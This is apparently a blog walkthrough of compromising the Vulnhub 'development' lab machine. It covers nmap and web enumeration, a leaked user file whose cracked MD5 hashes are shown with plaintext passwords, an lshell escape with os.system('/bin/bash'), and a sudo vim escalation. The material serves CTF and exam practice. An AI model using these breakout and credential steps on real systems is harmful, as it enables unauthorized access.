0xBEN
/
Sign up to 0xBEN!
Already have an account? Sign in

Vulnhub | digitalworld.local - development

Vulnhub | digitalworld.local - development
0xBEN
21 min read
In: Vulnhub, TJ Null OSCP Practice, OSCP Prep, CTF, Attack

Nmap Scan

# Nmap 7.91 scan initiated Sat Sep 18 11:58:17 2021 as: nmap -T4 -p- -A -oA scan-advanced 10.9.9.22  
Nmap scan report for development.cyber.range (10.9.9.22)  
Host is up (0.00046s latency).  
Not shown: 65530 closed ports  
PORT     STATE SERVICE     VERSION  
22/tcp   open  ssh         OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)  
| ssh-hostkey:    
|   2048 79:07:2b:2c:2c:4e:14:0a:e7:b3:63:46:c6:b3:ad:16 (RSA)  
|   256 c2:b6:8c:36:a6:dd:9b:17:bb:4f:0e:0f:16:89:d6:4b (ECDSA)  
|_  256 24:6b:85:e3:ab:90:5c:ec:d5:83:49:54:cd:98:31:95 (ED25519)  
113/tcp  open  ident?  
|_auth-owners: oident  
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)  
|_auth-owners: root  
445/tcp  open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)  
|_auth-owners: root  
8080/tcp open  http-proxy  IIS 6.0  
| fingerprint-strings:    
|   GetRequest:    
|     HTTP/1.1 200 OK  
|     Date: Sat, 18 Sep 2021 15:58:24 GMT  
|     Server: IIS 6.0  
|     Last-Modified: Wed, 26 Dec 2018 01:55:41 GMT  
|     ETag: "230-57de32091ad69"  
|     Accept-Ranges: bytes  
|     Content-Length: 560  
|     Vary: Accept-Encoding  
|     Connection: close  
|     Content-Type: text/html  
|     <html>  
|     <head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>  
|     </head>  
|     <body>  
|     <p>Welcome to the Development Page.</p>  
|     <br/>  
|     <p>There are many projects in this box. View some of these projects at html_pages.</p>  
|     <br/>  
|     <p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodte  
ch.com.sg.</p>  
|     <br/>  
|     <br/>  
|     <br/>  
|     <hr>  
|     <i>Powered by IIS 6.0</i>  
|     </body>  
|     <!-- Searching for development secret page... where could it be? -->  
|     <!-- Patrick, Head of Development-->  
|     </html>  
|   HTTPOptions:    
|     HTTP/1.1 200 OK  
|     Date: Sat, 18 Sep 2021 15:58:24 GMT  
|     Server: IIS 6.0  
|     Allow: GET,POST,OPTIONS,HEAD  
|     Content-Length: 0  
|     Connection: close  
|     Content-Type: text/html  
|   RTSPRequest:    
|     HTTP/1.1 400 Bad Request  
|     Date: Sat, 18 Sep 2021 15:58:24 GMT  
|     Server: IIS 6.0  
|     Content-Length: 288  
|     Connection: close  
|     Content-Type: text/html; charset=iso-8859-1  
|     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">  
|     <html><head>  
|     <title>400 Bad Request</title>  
|     </head><body>  
|     <h1>Bad Request</h1>  
|     <p>Your browser sent a request that this server could not understand.<br />  
|     </p>  
|     <hr>  
|     <address>IIS 6.0 Server at 10.9.9.22 Port 8080</address>  
|_    </body></html>  
|_http-open-proxy: Proxy might be redirecting requests  
|_http-server-header: IIS 6.0  
|_http-title: DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!  
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at h  
ttps://nmap.org/cgi-bin/submit.cgi?new-service :  
SF-Port8080-TCP:V=7.91%I=7%D=9/18%Time=61460CA1%P=x86_64-pc-linux-gnu%r(Ge  
SF:tRequest,330,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2018\x20Sep\x202  
SF:021\x2015:58:24\x20GMT\r\nServer:\x20IIS\x206\.0\r\nLast-Modified:\x20W  
SF:ed,\x2026\x20Dec\x202018\x2001:55:41\x20GMT\r\nETag:\x20\"230-57de32091  
SF:ad69\"\r\nAccept-Ranges:\x20bytes\r\nContent-Length:\x20560\r\nVary:\x2  
SF:0Accept-Encoding\r\nConnection:\x20close\r\nContent-Type:\x20text/html\  
SF:r\n\r\n<html>\r\n<head><title>DEVELOPMENT\x20PORTAL\.\x20NOT\x20FOR\x20  
SF:OUTSIDERS\x20OR\x20HACKERS!</title>\r\n</head>\r\n<body>\r\n<p>Welcome\  
SF:x20to\x20the\x20Development\x20Page\.</p>\r\n<br/>\r\n<p>There\x20are\x  
SF:20many\x20projects\x20in\x20this\x20box\.\x20View\x20some\x20of\x20thes  
SF:e\x20projects\x20at\x20html_pages\.</p>\r\n<br/>\r\n<p>WARNING!\x20We\x  
SF:20are\x20experimenting\x20a\x20host-based\x20intrusion\x20detection\x20  
SF:system\.\x20Report\x20all\x20false\x20positives\x20to\x20patrick@goodte  
SF:ch\.com\.sg\.</p>\r\n<br/>\r\n<br/>\r\n<br/>\r\n<hr>\r\n<i>Powered\x20b  
SF:y\x20IIS\x206\.0</i>\r\n</body>\r\n\r\n<!--\x20Searching\x20for\x20deve  
SF:lopment\x20secret\x20page\.\.\.\x20where\x20could\x20it\x20be\?\x20-->\  
SF:r\n\r\n<!--\x20Patrick,\x20Head\x20of\x20Development-->\r\n\r\n</html>\  
SF:r\n")%r(HTTPOptions,A6,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Sat,\x2018\x  
SF:20Sep\x202021\x2015:58:24\x20GMT\r\nServer:\x20IIS\x206\.0\r\nAllow:\x2  
SF:0GET,POST,OPTIONS,HEAD\r\nContent-Length:\x200\r\nConnection:\x20close\  
SF:r\nContent-Type:\x20text/html\r\n\r\n")%r(RTSPRequest,1C7,"HTTP/1\.1\x2  
SF:0400\x20Bad\x20Request\r\nDate:\x20Sat,\x2018\x20Sep\x202021\x2015:58:2  
SF:4\x20GMT\r\nServer:\x20IIS\x206\.0\r\nContent-Length:\x20288\r\nConnect  
SF:ion:\x20close\r\nContent-Type:\x20text/html;\x20charset=iso-8859-1\r\n\  
SF:r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//IETF//DTD\x20HTML\x202\.0//EN\">  
SF:\n<html><head>\n<title>400\x20Bad\x20Request</title>\n</head><body>\n<h  
SF:1>Bad\x20Request</h1>\n<p>Your\x20browser\x20sent\x20a\x20request\x20th  
SF:at\x20this\x20server\x20could\x20not\x20understand\.<br\x20/>\n</p>\n<h  
SF:r>\n<address>IIS\x206\.0\x20Server\x20at\x2010\.9\.9\.22\x20Port\x20808  
SF:0</address>\n</body></html>\n");  
Device type: general purpose  
Running: Linux 4.X  
OS CPE: cpe:/o:linux:linux_kernel:4.4  
OS details: Linux 4.4  
Network Distance: 2 hops  
Service Info: Host: DEVELOPMENT; OS: Linux; CPE: cpe:/o:linux:linux_kernel  
  
Host script results:  
|_clock-skew: mean: -7s, deviation: 6s, median: -11s  
|_nbstat: NetBIOS name: DEVELOPMENT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)  
| smb-os-discovery:    
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)  
|   Computer name: development  
|   NetBIOS computer name: DEVELOPMENT\x00  
|   Domain name: \x00  
|   FQDN: development  
|_  System time: 2021-09-18T16:00:53+00:00  
| smb-security-mode:    
|   account_used: guest  
|   authentication_level: user  
|   challenge_response: supported  
|_  message_signing: disabled (dangerous, but default)  
| smb2-security-mode:    
|   2.02:    
|_    Message signing enabled but not required  
| smb2-time:    
|   date: 2021-09-18T16:00:53  
|_  start_date: N/A  
  
TRACEROUTE (using port 8888/tcp)  
HOP RTT     ADDRESS  
1   0.31 ms pfSense.cyber.range (10.0.0.1)  
2   0.45 ms development.cyber.range (10.9.9.22)  
  
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .  
# Nmap done at Sat Sep 18 12:01:26 2021 -- 1 IP address (1 host up) scanned in 188.80 seconds




Service Enumeration

SMB

┌──(ben㉿kali)-[~/Pentest/Vulnhub/OSCP-Like/DIGITALWORLD.LOCAL-DEV]  
└─$ smbclient -L //$target --option="client min protocol=core" -U ''  
  
Enter WORKGROUP\'s password:    
  
       Sharename       Type      Comment  
       ---------       ----      -------  
       print$          Disk      Printer Drivers  
       access          Disk         
       IPC$            IPC       IPC Service (development server (Samba, Ubuntu))  
Reconnecting with SMB1 for workgroup listing.  
  
       Server               Comment  
       ---------            -------  
  
       Workgroup            Master  
       ---------            -------  
       MYGROUP              KIOPTRIX  
       WORKGROUP            DEVELOPMENT

None of the shares can be opened anonymously.

HTTP (TCP/8080)

I try to use gobuster to enumerate more files and directories, but there is some kind of firewall that blacklisting me after too many failed hits.

The site index directs me to html_pages to check out some projects. I inspect the page source code and find a reference to a secret page in an HTML comment as well.

http://10.9.9.22:8080

<html>
<head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
</head>
<body>
<p>Welcome to the Development Page.</p>
<br/>
<p>There are many projects in this box. View some of these projects at html_pages.</p>
<br/>
<p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
<br/>
<br/>
<br/>
<hr>
<i>Powered by IIS 6.0</i>
</body>

<!-- Searching for development secret page... where could it be? -->

<!-- Patrick, Head of Development-->

</html>

I double check for a robots.txt file but find nothing useful. Time to take a look at html_pages.

Clearly the IIS server tag is a poor attempt at security through obscurity. It's pretty clear that this is a Linux server.

I am going to try each site with the .html extension and without. I copy the output to a local file called sites.txt.

-rw-r--r-- 1 www-data www-data      285 Sep 26 17:46 about.html
-rw-r--r-- 1 www-data www-data     1049 Sep 26 17:51 config.html
-rw-r--r-- 1 www-data www-data      199 Jul 23 15:37 default.html
-rw-r--r-- 1 www-data www-data     1086 Sep 28 09:22 development.html
-rw-r--r-- 1 www-data www-data      446 Jun 14 01:37 downloads.html
-rw-r--r-- 1 www-data www-data      285 Sep 26 17:53 error.html
-rw-r--r-- 1 www-data www-data        0 Sep 28 09:23 html_pages
-rw-r--r-- 1 www-data www-data      751 Sep 28 09:22 index.html
-rw-r--r-- 1 www-data www-data      202 Sep 26 17:57 login.html
-rw-r--r-- 1 www-data www-data      682 Jul 23 15:36 register.html
-rw-r--r-- 1 www-data www-data       74 Jul 23 16:29 tryharder.html
-rw-r--r-- 1 www-data www-data      186 Sep 26 17:58 uploads.html
cat sites.txt | awk -F' ' '{print $9}' > html.txt
cat sites.txt | awk -F' ' '{print $9}' | sed 's/\.html//g' > nohtml.txt

So, I will try navigating through each site in the following manner:

  • https://10.9.9.22:8080/about.html
  • https://10.9.9.22:8080/about

about

/----------------\
|/--------------\|
||   ABOUT US   ||
|\--------------/|
\----------------/

/--------------------------------------------\
| WHO ARE WE?                                |
| WE ARE DEVELOPERS WHO ENJOY TRYING HARDER. |
|                                            |
| WHY ARE WE DEVELOPERS?                     |
| WE ENJOY CREATING APPLICATIONS THAT MAKE   |
| OUR USERS TRY HARDER.                      |
\--------------------------------------------/

/--------------------------------------------\
| ARE YOU GUYS CRAZY?                        |
| NO. WE MERELY ENJOY WATCHING YOU SUFFER.   |
| IF YOU CANNOT ROOT THIS BOX...             |
| WE WILL KEEP LAUGHING AND TELLING YOU TO   |
| TRY HARDER!                                |
\--------------------------------------------/

/----------------\
|/--------------\|
|| CHEERS!      ||
|| PATRICK      ||
|| HEAD, DEVT   ||
|\--------------/|
\----------------/

about.html

<html>
<head><title>About Good Tech</title>
</head>
<body>
<p>Good Tech is a company founded by our Director, David.</p>

<p><i>We are currently still building David's profile. Sorry!</i></p>
<br/>
<br/>
<br/>
<br/>
<br/>
<hr>
<i>Powered by IIS 6.0</i>
</body>
</html>

config

Empty

config.html

?

default

Empty

default.html

<html>
<head><title>Default Page</title>
</head>
<body>
<p>
01001000 01010101 01001000 00111111
</p>
<br />
<br />
<br />
<br />
<br />
<hr>
<i>Powered by IIS 6.0</i>
</body>
</html>

The binary converts to HUH?

development

Under development we have a variety of projects.

/test.pcap: a simple bash script that allows Director, from the comfort of his desk, to be routinely fed network information. He can then employ a scraper to download the .pcap files to view at his own convenience.
/development.html: the landing page to our development secret page. Only insiders will know!
/registration: under construction.

We are also testing a very simple web-based log-in form, a HIDS called OSSEC (heard it is awesome) and some other developments.

The question is, do you know what to do? Try harder!

development.html

<html>
<head><title>Security by Obscurity: The Path to DEVELOPMENTSECRETPAGE.</title>
</head>
<body>
<p>Security by obscurity is one of the worst ways one can defend from a cyberattack. This assumes that the adversary is not smart enough to be able to detect weak points in a corporate network.</p>
<p>An example of security by obscurity is in the local of webpages. For instance, IT administrators like to insert backdoors into applications for remote management, sometimes without the project teams knowing.</p>
<p>Once I worked on an implementation whereby the developer added a backdoor which was aptly named "hackersecretpage". It was hilarious because it contained a link to a file upload function, where the hacker installed a VNC viewer to perform remote desktop management!</p>
<p>A pity Patrick claims to be a security advocate, but isn't one. Hence, I shall secretly write in pages to guide hackers to make Patrick learn his lesson the hard way.</p>
</body>

<hr>
<i>Powered by IIS 6.0.</i>

</html>

<!-- You tried harder! Visit ./developmentsecretpage. -->

Comment shows /developmentsecretpage (also discovered in test.pcap)

downloads

Empty

downloads.html

<html>
<head><title>Useful Resources</title>
</head>
<body>
<p>Downloads:</p>
<br />
<a href="./martell.jpg">Patrick's Favourite Drink</a>
<a href="./tryharder.jpg">The Intern's Life Motto</a>
<!-- <a href="./test.pcap">Logging</a> -->
<br />
<br />
<br />
<br />
<br />
<hr>
<i>Powered by IIS 6.0</i>
</body>
</html>

error

Nothing relevant

error.html

Empty

index

Empty

index.html

<html>
<head><title>DEVELOPMENT PORTAL. NOT FOR OUTSIDERS OR HACKERS!</title>
</head>
<body>
<p>Welcome to the Development Page.</p>
<br/>
<p>There are many projects in this box. View some of these projects at html_pages.</p>
<br/>
<p>WARNING! We are experimenting a host-based intrusion detection system. Report all false positives to patrick@goodtech.com.sg.</p>
<br/>
<br/>
<br/>
<hr>
<i>Powered by IIS 6.0</i>
</body>

<!-- Searching for development secret page... where could it be? -->

<!-- Patrick, Head of Development-->

</html>

login

Empty

login.html

<html>
<head><title>Login Page</title>
</head>
<body>
<p><b>Where could the log-in page be?</b> </p>
<br />
<br />
<br />
<br />
<br />
<i>Powered by IIS 6.0</i>
</body>
</html>

register

Empty

register.html

<html>
<head><title>Registration for Development Team</title>
</head>
<body>
<p>
01010011 01110101 01110010 01100101 01101100 01111001 00100000 01100100 01100101 01110110 01100101 01101100 01101111 01110000 01101101 01100101 01101110 01110100 00100000 01110011 01100101 01100011 01110010 01100101 01110100 00100000 01110000 01100001 01100111 01100101 00100000 01101001 01110011 00100000 01101110 01101111 01110100 00100000 01110100 01101000 01100001 01110100 00100000 01101000 01100001 01110010 01100100 00100000 01110100 01101111 00100000 01100110 01101001 01101110 01100100 00111111
</p>
<br />
<br />
<br />
<br />
<br />
<i>Powered by IIS 6.0</i>
</body>
</html>

Use PowerShell to convert binary back to decimal, then to char array, then to string

$string = @'
01010011 01110101 01110010 01100101 01101100 01111001 00100000 01100100 01100101 01110110 01100101 01101100 01101111 01110000 01101101 01100101 01101110 01110100 00100000 01110011 01100101 01100011 01110010 01100101 01110100 00100000 01110000 01100001 01100111 01100101 00100000 01101001 01110011 00100000 01101110 01101111 01110100 00100000 01110100 01101000 01100001 01110100 00100000 01101000 01100001 01110010 01100100 00100000 01110100 01101111 00100000 01100110 01101001 01101110 01100100 00111111
'@

$string.Split(' ').ForEach({[char][convert]::ToInt32({$_, 2})}) -join ''

Surely development secret page is not that hard to find?

tryharder

Empty

tryharder.html

Look around you!

Try harder!

uploads

Empty

uploads.html

|. . . . . . . .|
| . . . . . . . |
|. . . . . . . .|
     UPLOADS
|. . . . . . . .|
| . . . . . . . |
|. . . . . . . .|

======================================================================================

Someone used to tell me a story about a boy called Rick. Every day, he would enter the
office at 6 am in the morning to work on his code. He worked very very hard, exceeding
his peers. He tried harder than everyone else in his code and work ethic. After months
of dedication, he eventually got a working proof-of-concept. However, he was undone by
a stupid thing. He misconfigured his server; he ran his webserver as root. The rest of
the story was history; a hacker eventually UPLOADED a web shell, and was root! PWNED!!

By now you realise this story has absolutely nothing to do with the page you currently
see. You have essentially been trolled by a short story; you must try harder to attack
this machine! PLEASE PWN ME, OR ELSE I WILL TELL PATRICK THAT OBSCURITY IS AWESOME! :)

======================================================================================

/developmentsecretpage


<html>
<head>
<title>Welcome to Good Tech</title>
</head>
<body>

<p>
Welcome to the Development Secret Page. 
</p>

<p>
Please drop by <a href="./patrick.php">Patrick's</a> PHP page to get to know our Development Head better. But beware, this site is still under construction; please bear with us!
</p>


This is the property of Good Tech. All rights reserved.
</body>
</html>

/developmentsecretpage/patrick.php

<html>
<head>
<title>Page title</title>
</head>
<body>
<p> Welcome to my profile page! I am Patrick, the Head of Development in Good Tech. </p>

<p> I have previously worked in enterprise technologies. I joined Good Tech two years ago as the then-Manager of Development. I lead two teams: one that does enterprise architecture and an in-house development team.
</p>

<p> As long as you're willing to <b>try harder</b>, there will always be a future for the young aspiring developer or solution architect! Please visit our <a href="./sitemap.php">sitemap</a> to find out more about our department.</p>

<p> Regards <br/>
Patrick<br/>
Head, Development Network</p>

<p>
<a href="/developmentsecretpage/patrick.php?logout=1">Click here to log out.</a>
</p>

This is the property of Good Tech. All rights reserved.
</body>
</html>

/developmentsecretpage/patrick.php?logout=1

<html>
<head>
<title>Page title</title>
</head>
<body><!--  This is the login form  -->
<form method="post" action="/developmentsecretpage/patrick.php">
Username: <input type="text" name="slogin_POST_username" value=""><br>
Password: <input type="password" name="slogin_POST_password"><br>
<input type="submit" name="slogin_POST_send" value="Enter">
</form>
This is the property of Good Tech. All rights reserved.
</body>
</html>

Testing the login page throws an error

<br />
<b>Deprecated</b>:  Function ereg_replace() is deprecated in <b>/var/www/html/developmentsecretpage/slogin_lib.inc.php</b> on line <b>335</b><br />
<br />
<b>Deprecated</b>:  Function ereg_replace() is deprecated in <b>/var/www/html/developmentsecretpage/slogin_lib.inc.php</b> on line <b>336</b><br />
<html>
<head>
<title>Page title</title>
</head>
<body>
<p> Welcome to my profile page! I am Patrick, the Head of Development in Good Tech. </p>

<p> I have previously worked in enterprise technologies. I joined Good Tech two years ago as the then-Manager of Development. I lead two teams: one that does enterprise architecture and an in-house development team.
</p>

<p> As long as you're willing to <b>try harder</b>, there will always be a future for the young aspiring developer or solution architect! Please visit our <a href="./sitemap.php">sitemap</a> to find out more about our department.</p>

<p> Regards <br/>
Patrick<br/>
Head, Development Network</p>

<p>
<a href="/developmentsecretpage/patrick.php?logout=1">Click here to log out.</a>
</p>

This is the property of Good Tech. All rights reserved.
</body>
</html>

/developmentsecretpage/sitemap.php

<html>
<head>
<title>A Map of the Development Network -- the Brains of Good Tech</title>
</head>
<body>
<!-- Intern, please perform the proper hyperlinking of the sitemap.-->
<!-- Patrick, Head Development-->

<p> Hi fellow colleague! Currently we only have links to the <a href="./securitynotice.php">security notice</a> and the <a href="./directortestpagev1.php">director test page</a>. <b>With effect from 11/2/2017, we have shifted the test page to the main webroot. You will know how to find it easily.</b> </p>

<p> For more enquiries, please feel free to speak to <a href="./patrick.php">Patrick</a>, our Head of Development.</p>

<p> If there are any bugs, please find the intern at <a href="intern@goodtech.org.sg">the intern's contact page.</a></p>

<p> Regards <br/>
Patrick<br/>
Head, Development Network</p>

<p>
<a href="/developmentsecretpage/sitemap.php?logout=1">Click here to log out.</a>
</p>

This is the property of Good Tech. All rights reserved.
</body>
</html>

/developmentsecretpage/securitynotice.php

<html>
<head>
<title>Security Notice</title>
</head>
<body>
<p> Recently a security audit was conducted in the Development environment. </p>

<p> We found that our developers have been using passwords that resembled dictionary words, and are easily crackable. The most common offenders are:<br/>
1. password<br/>
2. Password<br/>
3. P@ssw0rd<br/>
</p>

<p>(Yes, we know that Number 3 is compliant with our strong password policy, but we found so many copies of this password that it might be as good as junk from a security angle. Please at least use something like P@ssw0rd1...)</p>

<p> Effective today, any <b>permanent</b> staff found with such passwords in the Development environment will be subject to a security remedial training. Also, we will extend the password expiry enforcement of thirty (30) days from heads and above to all permanent staff of the company. The password history will be set to 10, though if you would like, you can always "cycle" through more passwords.</p>

<p> Regards <br/>
Patrick<br/>
Head, Development Network</p>

<p>
<a href="/developmentsecretpage/securitynotice.php?logout=1">Click here to log out.</a>
</p>

This is the property of Good Tech. All rights reserved.
</body>
</html>

Seems like interns may not be subject to restrictions on bad passwords

/developmentsecretpage/directortestpagev1.php

<html>
<head>
<title>Director's Update Panel Version 1.0</title>
</head>
<body>
<p> Hi Director! This is the test page to provide Director with eye-catching updates. </p>

<p> We know Director is busy and hence needs updates delivered in a timely manner.</p>

<p> Patrick and I will routinely update this page with a pop-up that details if there is anything important.</p>

<script>alert("Director, there is nothing for your immediate attention.");</script>

<!-- Director's comments: Does this not appear to be rather silly? I think we can make use of shoutbox. -->
<!-- Patrick's response: OK. When do you want it? -->
<!-- Director's comments: In three months' time. -->
<!-- Patrick's response: We have cleared test.html for testing purposes. We'll put up a warning for the rest to know it is not to be meddled. -->
<!-- Director's comments: Approved. -->

<p> Regards <br/>
Patrick<br/>
Head, Development Network</p>

<p>
<a href="/developmentsecretpage/directortestpagev1.php?logout=1">Click here to log out.</a>
</p>

This is the property of Good Tech. All rights reserved.
</body>
</html>

/developmentsecretpage/slog_users.txt

https://www.exploit-db.com/exploits/7444

[0x01] Informations:

Script         : Simple Text-File Login script 1.0.6
Download       : http://www.hotscripts.com/jump.php?listing_id=36777&jump_type=1
Vulnerability  : Remote File Inclusion / Sensitive Data Disclosure
Author         : Osirys
Contact        : osirys[at]live[dot]it
Notes          : Proud to be Italian
Greets:        : XaDoS, x0r, emgent, Jay
Notes          : *
admin, 3cb1d13bb83ffff2defe8d1443d3a0eb (unknown)
intern, 4a8a2b374f463b7aedbb44a066363b81 (12345678900987654321)
patrick, 87e6d56ce79af90dbe07d387d3d0579e (P@ssw0rd25)
qiu, ee64497098d0926d198f54f6d5431f98 (qiu)




Exploit

The use of deprecated PHP libraries exposed a plaintext file containing usernames and hashes inside of a web directory /[path]/slog_users.txt. I was able to read the file and crack the hashes using john

Now in possession of some passwords, I was able to SSH into the system as the intern user.

┌──(ben㉿kali)-[~/…/Vulnhub/OSCP-Like/DIGITALWORLD.LOCAL-DEV/hashes]
└─$ ssh intern@$target                                                                 

intern@10.9.9.22's password: 
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-34-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sun Sep 19 04:08:46 UTC 2021

  System load:  0.16               Processes:            123
  Usage of /:   28.6% of 19.56GB   Users logged in:      0
  Memory usage: 6%                 IP address for ens18: 10.9.9.22
  Swap usage:   0%


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

32 packages can be updated.
0 updates are security updates.


Last login: Thu Aug 23 15:57:48 2018 from 192.168.254.228
Congratulations! You tried harder!
Welcome to Development!
Type '?' or 'help' to get the list of allowed commands
intern:~$




Post-Exploitation Enumeration

Certain commands are causing shell environment to crash

intern:~$ id
Traceback (most recent call last):
  File "/usr/local/bin/lshell", line 27, in <module>
    lshell.main()
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 1165, in main
    cli.cmdloop()
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 385, in cmdloop
    stop = self.onecmd(line)
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 503, in onecmd
    func = getattr(self, 'do_' + cmd)
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 134, in __getattr__
    if self.check_path(self.g_line) == 1:
  File "/usr/local/lib/python2.7/dist-packages/lshell.py", line 303, in check_path
    item = re.sub('^~', self.conf['home_path'], item)
  File "/usr/lib/python2.7/re.py", line 155, in sub
    return _compile(pattern, flags).sub(repl, string, count)
TypeError: expected string or buffer
Connection to 10.9.9.22 closed.

I need to understand more about the current shell environment.

intern:~$ echo $SHELL
/usr/local/bin/lshell

lshell breakout: https://www.aldeid.com/wiki/Lshell

intern:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

intern:~$ echo os.system('/bin/bash')

intern@development:~$ help

GNU bash, version 4.4.19(1)-release (x86_64-pc-linux-gnu)
These shell commands are defined internally.  Type `help' to see this list.
Type `help name' to find out more about the function `name'.
Use `info bash' to find out more about the shell in general.
Use `man -k' or `info' to find out more about commands not in this list.

A star (*) next to a name means that the command is disabled.

 job_spec [&]                                                  history [-c] [-d offset] [n] or history -anrw [filename] o>
 (( expression ))                                              if COMMANDS; then COMMANDS; [ elif COMMANDS; then COMMANDS>
 . filename [arguments]                                        jobs [-lnprs] [jobspec ...] or jobs -x command [args]
 :                                                             kill [-s sigspec | -n signum | -sigspec] pid | jobspec ...>
 [ arg... ]                                                    let arg [arg ...]
 [[ expression ]]                                              local [option] name[=value] ...
 alias [-p] [name[=value] ... ]                                logout [n]
 bg [job_spec ...]                                             mapfile [-d delim] [-n count] [-O origin] [-s count] [-t] >
 bind [-lpsvPSVX] [-m keymap] [-f filename] [-q name] [-u na>  popd [-n] [+N | -N]
 break [n]                                                     printf [-v var] format [arguments]
 builtin [shell-builtin [arg ...]]                             pushd [-n] [+N | -N | dir]

[removed for brevity]

User Flag

Envrionment

Current User

intern@development:~$ sudo -l  
[sudo] password for intern:    
Sorry, user intern may not run sudo on development. 

intern@development:~$ id  
uid=1002(intern) gid=1006(intern) groups=1006(intern

OS and Kernel

intern@development:~$ uname -a && echo -e '\n' && cat /etc/*release  
Linux development 4.15.0-34-generic #37-Ubuntu SMP Mon Aug 27 15:21:48 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux  
  
  
DISTRIB_ID=Ubuntu  
DISTRIB_RELEASE=18.04  
DISTRIB_CODENAME=bionic  
DISTRIB_DESCRIPTION="Ubuntu 18.04.1 LTS"  
NAME="Ubuntu"  
VERSION="18.04.1 LTS (Bionic Beaver)"  
ID=ubuntu  
ID_LIKE=debian  
PRETTY_NAME="Ubuntu 18.04.1 LTS"  
VERSION_ID="18.04"  
HOME_URL="https://www.ubuntu.com/"  
SUPPORT_URL="https://help.ubuntu.com/"  
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"  
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"  
VERSION_CODENAME=bionic  
UBUNTU_CODENAME=bionic

Users and Groups

cat /etc/passwd && cat/etc/groups

Scheduled Tasks

None

Interesting Files

/var/www/html/developmentsecretpage/directortestpagev1.php.save

<!-- Director's comments: Does this not appear to be rather silly? I think we can make use of shoutbox. -->
<!-- Patrick's response: OK. When do you want it? -->
<!-- Director's comments: In three months' time. -->
<!-- Patrick's response: We are going to trial version 2 at shout.php. I think it's more accessible to all staff members and is no longer in the developersecretpage directory.-->
<!-- Director's comments: Approved. -->




Privilege Escalation

Lateral movement to Patrick's account using cracked MD5 hash

Patrick can run sudo vim, which can be used to escalate privileges.

Root Flag

Written by
0xBEN

0xBEN

View all posts
More from 0xBEN
Vulnhub

Vulnhub | EVM: 1

In this post, we will take a look at the steps I took to completely compromise the "EVM: 1" host from Vulnhub.
0xBEN
20 min read
Vulnhub

Vulnhub | Healthcare: 1

In this post, we will take a look at the steps I took to completely compromise the "Healthcare: 1" host from Vulnhub.
0xBEN
5 min read
Table of Contents
Great! You’ve successfully signed up.
Welcome back! You've successfully signed in.
You've successfully subscribed to 0xBEN.
Your link has expired.
Success! Check your email for magic link to sign-in.
Success! Your billing info has been updated.
Your billing was not updated.